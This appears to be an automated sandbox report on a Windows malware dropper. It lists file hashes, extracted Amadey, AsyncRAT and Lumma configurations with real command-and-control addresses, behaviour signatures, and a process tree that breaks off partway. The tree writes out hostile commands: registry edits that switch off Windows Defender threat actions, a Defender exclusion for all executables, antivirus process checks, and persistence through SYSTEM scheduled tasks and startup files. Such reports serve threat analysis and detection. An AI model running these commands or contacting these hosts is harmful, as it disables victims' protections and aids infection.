Analysis

  • max time kernel
    150s
  • max time network
    152s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240802-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
  • submitted
    01-09-2024 01:38

General

  • Target

    bf554462c091219488a1a53fff22213df8d9530fa6ff0f59033b0c9ee9173555.exe

  • Size

    1.3MB

  • MD5

    046ebd7e0f619f33de609ea3f126b0d3

  • SHA1

    37a0b634955eb29f9bc7d3d434838cd729bb7e17

  • SHA256

    bf554462c091219488a1a53fff22213df8d9530fa6ff0f59033b0c9ee9173555

  • SHA512

    39afa534b862f9faebb4aa1ff4144a7d53f62adfd389531f75bdf10865fe8d846e79b3138ec90f2e9d4eb92a72e7a856f0c7be857a892a54eb2f2503f3030d10

  • SSDEEP

    24576:39O/bmU++vQu1TL9yJ5d2m8y7i1HlcoGpJ042jJpUeBk2h:3k/X+75dAyMGDP2dpUYXh

Malware Config

Extracted

Family

amadey

Version

4.41

Botnet

1176f2

C2

http://185.215.113.19

Attributes
  • install_dir

    417fd29867

  • install_file

    ednfoki.exe

  • strings_key

    183201dc3defc4394182b4bff63c4065

  • url_paths

    /CoreOPT/index.php

rc4.plain

Extracted

Family

asyncrat

Version

0.5.8

Botnet

Default

C2

45.200.149.147:4782

Mutex

uXnIs7mA0Z5R

Attributes
  • delay

    3

  • install

    false

  • install_file

    javaupdate.exe

  • install_folder

    %AppData%

aes.plain

Extracted

Family

lumma

C2

https://millyscroqwp.shop/api

https://locatedblsoqp.shop/api

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

  • AsyncRat

    AsyncRAT is designed to remotely monitor and control other computers written in C#.

  • Detects ZharkBot payload 1 IoCs

    ZharkBot is a botnet written C++.

  • Lumma Stealer, LummaC

    Lumma or LummaC is an infostealer written in C++ first seen in August 2022.

  • Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs
  • ZharkBot

    ZharkBot is a botnet written C++.

  • Credentials from Password Stores: Credentials from Web Browsers 1 TTPs

    Malicious Access or copy of Web Browser Credential store.

  • Command and Scripting Interpreter: PowerShell 1 TTPs 6 IoCs

    Run Powershell and hide display window.

  • Downloads MZ/PE file
  • Checks BIOS information in registry 2 TTPs 1 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 5 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 2 IoCs
  • Executes dropped EXE 13 IoCs
  • Indirect Command Execution 1 TTPs 17 IoCs

    Adversaries may abuse utilities that allow for command execution to bypass security restrictions that limit the use of command-line interpreters.

  • Loads dropped DLL 1 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Adds Run key to start application 2 TTPs 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Drops Chrome extension 2 IoCs
  • Drops desktop.ini file(s) 1 IoCs
  • Drops file in System32 directory 31 IoCs
  • Enumerates processes with tasklist 1 TTPs 2 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • Drops file in Program Files directory 13 IoCs
  • Drops file in Windows directory 9 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 2 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Checks processor information in registry 2 TTPs 4 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 2 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 10 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 3 IoCs
  • Suspicious use of SendNotifyMessage 3 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
      PID:3592
      • C:\Users\Admin\AppData\Local\Temp\bf554462c091219488a1a53fff22213df8d9530fa6ff0f59033b0c9ee9173555.exe
        "C:\Users\Admin\AppData\Local\Temp\bf554462c091219488a1a53fff22213df8d9530fa6ff0f59033b0c9ee9173555.exe"
        2⤵
        • Checks computer location settings
        • Drops file in Windows directory
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:4988
        • C:\Windows\SysWOW64\cmd.exe
          "C:\Windows\System32\cmd.exe" /k move Honda Honda.bat & Honda.bat & exit
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:684
          • C:\Windows\SysWOW64\tasklist.exe
            tasklist
            4⤵
            • Enumerates processes with tasklist
            • System Location Discovery: System Language Discovery
            • Suspicious use of AdjustPrivilegeToken
            PID:1820
          • C:\Windows\SysWOW64\findstr.exe
            findstr /I "wrsa opssvc"
            4⤵
              PID:2820
            • C:\Windows\SysWOW64\tasklist.exe
              tasklist
              4⤵
              • Enumerates processes with tasklist
              • Suspicious use of AdjustPrivilegeToken
              PID:4092
            • C:\Windows\SysWOW64\findstr.exe
              findstr /I "avastui avgui bdservicehost nswscsvc sophoshealth"
              4⤵
                PID:4384
              • C:\Windows\SysWOW64\cmd.exe
                cmd /c md 591950
                4⤵
                • System Location Discovery: System Language Discovery
                PID:4336
              • C:\Windows\SysWOW64\findstr.exe
                findstr /V "BachelorRayPotentialBeats" Itsa
                4⤵
                • System Location Discovery: System Language Discovery
                PID:4872
              • C:\Windows\SysWOW64\cmd.exe
                cmd /c copy /b ..\Competent + ..\Screw + ..\Whom + ..\Reveal + ..\Provides + ..\Still + ..\Entrepreneurs + ..\Greatest + ..\Corporate + ..\Wireless E
                4⤵
                • System Location Discovery: System Language Discovery
                PID:2476
              • C:\Users\Admin\AppData\Local\Temp\591950\Shipment.pif
                Shipment.pif E
                4⤵
                • Suspicious use of NtCreateUserProcessOtherParentProcess
                • Checks computer location settings
                • Executes dropped EXE
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of FindShellTrayWindow
                • Suspicious use of SendNotifyMessage
                • Suspicious use of WriteProcessMemory
                PID:1520
                • C:\Users\Admin\AppData\Local\Temp\1000255001\channel2.exe
                  "C:\Users\Admin\AppData\Local\Temp\1000255001\channel2.exe"
                  5⤵
                  • Checks computer location settings
                  • Executes dropped EXE
                  • Checks processor information in registry
                  PID:4872
                  • C:\Users\Admin\AppData\Local\Temp\service123.exe
                    "C:\Users\Admin\AppData\Local\Temp\service123.exe"
                    6⤵
                    • Executes dropped EXE
                    • System Location Discovery: System Language Discovery
                    PID:1980
                • C:\Users\Admin\AppData\Local\Temp\1000256001\BowExpert.exe
                  "C:\Users\Admin\AppData\Local\Temp\1000256001\BowExpert.exe"
                  5⤵
                  • Executes dropped EXE
                  • Adds Run key to start application
                  • Suspicious use of SetThreadContext
                  PID:3324
                  • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
                    6⤵
                    • Suspicious use of AdjustPrivilegeToken
                    PID:1820
                • C:\Users\Admin\AppData\Local\Temp\1000260001\Channel1.exe
                  "C:\Users\Admin\AppData\Local\Temp\1000260001\Channel1.exe"
                  5⤵
                  • Checks computer location settings
                  • Executes dropped EXE
                  • Checks processor information in registry
                  PID:1984
                  • C:\Users\Admin\AppData\Local\Temp\service123.exe
                    "C:\Users\Admin\AppData\Local\Temp\service123.exe"
                    6⤵
                    • Executes dropped EXE
                    • Loads dropped DLL
                    PID:384
                • C:\Users\Admin\AppData\Local\Temp\1000262001\385107.exe
                  "C:\Users\Admin\AppData\Local\Temp\1000262001\385107.exe"
                  5⤵
                  • Executes dropped EXE
                  • Suspicious use of WriteProcessMemory
                  PID:2964
                  • C:\Users\Admin\AppData\Local\Temp\7zS42B1.tmp\Install.exe
                    .\Install.exe
                    6⤵
                    • Executes dropped EXE
                    • System Location Discovery: System Language Discovery
                    • Suspicious use of WriteProcessMemory
                    PID:2020
                    • C:\Users\Admin\AppData\Local\Temp\7zS4503.tmp\Install.exe
                      .\Install.exe /CtlLXdidO "385107" /S
                      7⤵
                      • Checks BIOS information in registry
                      • Checks computer location settings
                      • Executes dropped EXE
                      • System Location Discovery: System Language Discovery
                      • Enumerates system info in registry
                      • Suspicious use of WriteProcessMemory
                      PID:772
                      • C:\Windows\SysWOW64\cmd.exe
                        "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                        8⤵
                        • Suspicious use of WriteProcessMemory
                        PID:944
                        • C:\Windows\SysWOW64\forfiles.exe
                          forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
                          9⤵
                          • Indirect Command Execution
                          • System Location Discovery: System Language Discovery
                          PID:2040
                          • C:\Windows\SysWOW64\cmd.exe
                            /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                            10⤵
                              PID:3092
                              • \??\c:\windows\SysWOW64\reg.exe
                                reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                11⤵
                                • System Location Discovery: System Language Discovery
                                PID:4244
                          • C:\Windows\SysWOW64\forfiles.exe
                            forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
                            9⤵
                            • Indirect Command Execution
                            • System Location Discovery: System Language Discovery
                            PID:4620
                            • C:\Windows\SysWOW64\cmd.exe
                              /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                              10⤵
                                PID:3656
                                • \??\c:\windows\SysWOW64\reg.exe
                                  reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                  11⤵
                                  • System Location Discovery: System Language Discovery
                                  PID:1380
                            • C:\Windows\SysWOW64\forfiles.exe
                              forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
                              9⤵
                              • Indirect Command Execution
                              • System Location Discovery: System Language Discovery
                              PID:2228
                              • C:\Windows\SysWOW64\cmd.exe
                                /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                10⤵
                                • System Location Discovery: System Language Discovery
                                PID:2080
                                • \??\c:\windows\SysWOW64\reg.exe
                                  reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                  11⤵
                                    PID:2004
                              • C:\Windows\SysWOW64\forfiles.exe
                                forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
                                9⤵
                                • Indirect Command Execution
                                PID:1472
                                • C:\Windows\SysWOW64\cmd.exe
                                  /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                  10⤵
                                    PID:3172
                                    • \??\c:\windows\SysWOW64\reg.exe
                                      reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                      11⤵
                                        PID:4532
                                  • C:\Windows\SysWOW64\forfiles.exe
                                    forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                    9⤵
                                    • Indirect Command Execution
                                    PID:408
                                    • C:\Windows\SysWOW64\cmd.exe
                                      /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                      10⤵
                                      • System Location Discovery: System Language Discovery
                                      PID:2024
                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                        powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                        11⤵
                                        • Command and Scripting Interpreter: PowerShell
                                        • Suspicious behavior: EnumeratesProcesses
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:4712
                                        • C:\Windows\SysWOW64\gpupdate.exe
                                          "C:\Windows\system32\gpupdate.exe" /force
                                          12⤵
                                            PID:4184
                                  • C:\Windows\SysWOW64\forfiles.exe
                                    "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m waitfor.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"
                                    8⤵
                                    • Indirect Command Execution
                                    PID:556
                                    • C:\Windows\SysWOW64\cmd.exe
                                      /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                                      9⤵
                                      • System Location Discovery: System Language Discovery
                                      PID:2140
                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                        powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                                        10⤵
                                        • Command and Scripting Interpreter: PowerShell
                                        • Suspicious behavior: EnumeratesProcesses
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:384
                                        • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                          "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                                          11⤵
                                          • Suspicious use of AdjustPrivilegeToken
                                          PID:5036
                                  • C:\Windows\SysWOW64\schtasks.exe
                                    schtasks /CREATE /TN "bISIDNXXYteSJEZXLD" /SC once /ST 01:41:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\7zS4503.tmp\Install.exe\" W7 /PmhMdidMRP 385107 /S" /V1 /F
                                    8⤵
                                    • Drops file in Windows directory
                                    • Scheduled Task/Job: Scheduled Task
                                    PID:4516
                            • C:\Users\Admin\AppData\Local\Temp\1000268001\kitty.exe
                              "C:\Users\Admin\AppData\Local\Temp\1000268001\kitty.exe"
                              5⤵
                              • Executes dropped EXE
                              • System Location Discovery: System Language Discovery
                              PID:4720
                              • C:\Windows\SysWOW64\WerFault.exe
                                C:\Windows\SysWOW64\WerFault.exe -u -p 4720 -s 492
                                6⤵
                                • Program crash
                                PID:3904
                            • C:\Users\Admin\AppData\Local\Temp\1000277001\ovrflw.exe
                              "C:\Users\Admin\AppData\Local\Temp\1000277001\ovrflw.exe"
                              5⤵
                              • Executes dropped EXE
                              • Suspicious use of SetThreadContext
                              PID:2164
                              • C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
                                6⤵
                                  PID:4180
                            • C:\Windows\SysWOW64\choice.exe
                              choice /d y /t 5
                              4⤵
                              • System Location Discovery: System Language Discovery
                              PID:4928
                        • C:\Windows\SysWOW64\cmd.exe
                          cmd /c schtasks.exe /create /tn "Statistics" /tr "wscript //B 'C:\Users\Admin\AppData\Local\TrackGuard Technologies\GuardTrack.js'" /sc minute /mo 5 /F
                          2⤵
                          • Suspicious use of WriteProcessMemory
                          PID:540
                          • C:\Windows\SysWOW64\schtasks.exe
                            schtasks.exe /create /tn "Statistics" /tr "wscript //B 'C:\Users\Admin\AppData\Local\TrackGuard Technologies\GuardTrack.js'" /sc minute /mo 5 /F
                            3⤵
                            • Scheduled Task/Job: Scheduled Task
                            PID:4508
                        • C:\Windows\SysWOW64\cmd.exe
                          cmd /k echo [InternetShortcut] > "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\GuardTrack.url" & echo URL="C:\Users\Admin\AppData\Local\TrackGuard Technologies\GuardTrack.js" >> "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\GuardTrack.url" & exit
                          2⤵
                          • Drops startup file
                          PID:1368
                      • C:\Windows\SysWOW64\WerFault.exe
                        C:\Windows\SysWOW64\WerFault.exe -pss -s 432 -p 4720 -ip 4720
                        1⤵
                          PID:2496
                        • C:\Windows\system32\backgroundTaskHost.exe
                          "C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca
                          1⤵
                            PID:408
                          • C:\Users\Admin\AppData\Local\Temp\7zS4503.tmp\Install.exe
                            C:\Users\Admin\AppData\Local\Temp\7zS4503.tmp\Install.exe W7 /PmhMdidMRP 385107 /S
                            1⤵
                            • Executes dropped EXE
                            • Drops desktop.ini file(s)
                            • Drops file in System32 directory
                            • System Location Discovery: System Language Discovery
                            • Modifies data under HKEY_USERS
                            PID:644
                            • C:\Windows\SysWOW64\cmd.exe
                              "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                              2⤵
                                PID:1320
                                • C:\Windows\SysWOW64\forfiles.exe
                                  forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
                                  3⤵
                                  • Indirect Command Execution
                                  PID:5096
                                  • C:\Windows\SysWOW64\cmd.exe
                                    /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                    4⤵
                                    • System Location Discovery: System Language Discovery
                                    PID:2588
                                    • \??\c:\windows\SysWOW64\reg.exe
                                      reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                      5⤵
                                        PID:4632
                                  • C:\Windows\SysWOW64\forfiles.exe
                                    forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
                                    3⤵
                                    • Indirect Command Execution
                                    PID:4380
                                    • C:\Windows\SysWOW64\cmd.exe
                                      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                      4⤵
                                      • System Location Discovery: System Language Discovery
                                      PID:232
                                      • \??\c:\windows\SysWOW64\reg.exe
                                        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                        5⤵
                                          PID:4636
                                    • C:\Windows\SysWOW64\forfiles.exe
                                      forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
                                      3⤵
                                      • Indirect Command Execution
                                      PID:2488
                                      • C:\Windows\SysWOW64\cmd.exe
                                        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                        4⤵
                                          PID:5012
                                          • \??\c:\windows\SysWOW64\reg.exe
                                            reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                            5⤵
                                              PID:4276
                                        • C:\Windows\SysWOW64\forfiles.exe
                                          forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
                                          3⤵
                                          • Indirect Command Execution
                                          PID:3120
                                          • C:\Windows\SysWOW64\cmd.exe
                                            /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                            4⤵
                                              PID:4028
                                              • \??\c:\windows\SysWOW64\reg.exe
                                                reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                                5⤵
                                                  PID:616
                                            • C:\Windows\SysWOW64\forfiles.exe
                                              forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                              3⤵
                                              • Indirect Command Execution
                                              • System Location Discovery: System Language Discovery
                                              PID:2512
                                              • C:\Windows\SysWOW64\cmd.exe
                                                /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                                4⤵
                                                • System Location Discovery: System Language Discovery
                                                PID:4824
                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                                  5⤵
                                                  • Command and Scripting Interpreter: PowerShell
                                                  • Drops file in System32 directory
                                                  • Modifies data under HKEY_USERS
                                                  • Suspicious behavior: EnumeratesProcesses
                                                  • Suspicious use of AdjustPrivilegeToken
                                                  PID:1764
                                                  • C:\Windows\SysWOW64\gpupdate.exe
                                                    "C:\Windows\system32\gpupdate.exe" /force
                                                    6⤵
                                                      PID:4488
                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"
                                              2⤵
                                              • Drops file in System32 directory
                                              • Modifies data under HKEY_USERS
                                              • Suspicious behavior: EnumeratesProcesses
                                              • Suspicious use of AdjustPrivilegeToken
                                              PID:4584
                                              • C:\Windows\SysWOW64\cmd.exe
                                                "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
                                                3⤵
                                                • System Location Discovery: System Language Discovery
                                                PID:3804
                                                • C:\Windows\SysWOW64\reg.exe
                                                  REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
                                                  4⤵
                                                  • System Location Discovery: System Language Discovery
                                                  PID:3968
                                              • C:\Windows\SysWOW64\reg.exe
